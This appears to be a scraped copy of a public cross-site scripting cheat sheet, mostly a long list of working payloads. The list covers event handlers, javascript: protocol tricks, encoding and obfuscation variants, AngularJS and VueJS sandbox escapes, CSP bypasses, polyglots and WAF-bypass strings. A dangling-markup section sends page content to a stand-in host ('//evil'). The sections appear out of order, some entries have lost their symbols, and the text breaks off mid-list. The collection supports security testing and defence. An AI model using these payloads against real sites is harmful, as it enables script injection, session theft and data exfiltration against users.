<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />
CSS expressions, <= IE7
<div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">
In quirks mode IE allowed you to use = instead of :
<div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script> function window.onload(){ alert(1) } </script> <script> function window::onload(){ alert(1) } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>
GreyMagic HTML+TIME exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src="//evil?
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction
<isindex type=submit formaction="javascript:alert(1)">
Isindex and action
<isindex type=submit action="javascript:alert(1)">
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue, or by updating the JSON and creating a pull request.
No parentheses using exception handling and eval, on Firefox
<script>onerror=eval;throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval, without .
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses using location redirect
<script>location='javascript:alert\x281\x29'</script>
No parentheses using location redirect, no strings
<script>location=name</script>
No parentheses using template strings
<script>alert`1`</script>
No parentheses using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}````</script>
Frameworks
Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>
Bootstrap ontransitionend event
<xss class="carousel slide" data-ride="carousel" data-interval=100 ontransitionend=alert(1)><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>
Protocols
Iframe src attribute, JavaScript protocol
<iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">
A standard JavaScript protocol
<a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol
<a href="javas cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon
<a href="javascript :alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src
<script src=data:text/javascript,alert(1)></script>
SVG script href attribute without closing script tag
<svg><script href=data:text/javascript,alert(1) />
SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol, rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah
Button and formaction
<form><button formaction=javascript:alert(1)>XSS
Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage
<a href="#" download="filename.html">Test</a>
Disable referrer using referrerpolicy
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via parameter on the window.open function
<a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via name attribute in an <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via usemap attribute in an <img> tag
<img src="validimage.png" width=10 height=10 usemap="#xss"><map name="xss"><area shape=rect coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via target attribute in a <form> tag
<form action=http://subdomain1.portswigger-labs.net/xss/xss.php target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via formtarget attribute in an <input> tag, type submit
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction=http://subdomain1.portswigger-labs.net/xss/xss.php formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in an <input> tag, type image
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction=http://subdomain1.portswigger-labs.net/xss/xss.php formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute, UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referer
<meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes
<script>\u0061lert(1)</script>
Unicode escapes, ES6 style
<script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes
<script>eval('\x61lert(1)')</script>
Octal encoding
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon
<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9
<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
Obfuscation
Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64 and HTML entities
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
Iframe srcdoc, HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a="constructor";b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,"alert(1)")()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//'}}
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//'}}
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//'}}
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a="constructor";b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,"alert(1)")()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | {}.")));alert(1)//';
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute
<img src="//evil? <image src="//evil?
Video using track element
<video><track default src="//evil?
Video using source element and src attribute
<video><source src="//evil?
Audio using source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%;" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value=XSS style="width:100%;height:100%;" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss</a><base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string: string concatenation (window)
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: string concatenation (self)
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: string concatenation (this)
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: string concatenation (top)
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: string concatenation (parent)
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: string concatenation (frames)
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: string concatenation (globalThis)
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string: comment syntax (window)
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: comment syntax (self)
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: comment syntax (this)
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: comment syntax (top)
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: comment syntax (parent)
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: comment syntax (frames)
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: comment syntax (globalThis)
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string: hex escape sequence (window)
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence (self)
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence (this)
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence (top)
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence (parent)
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence (frames)
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence (globalThis)
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)
globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string: octal escape sequence (window)
window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: octal escape sequence (self)
self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: octal escape sequence (this)
this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: octal escape sequence (top)
top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: octal escape sequence (parent)
parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: octal escape sequence (frames)
frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: octal escape sequence (globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string: unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string: RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string: Hieroglyphy/JSFuck (window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string: Hieroglyphy/JSFuck (self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string: Hieroglyphy/JSFuck (this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string: Hieroglyphy/JSFuck (top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)
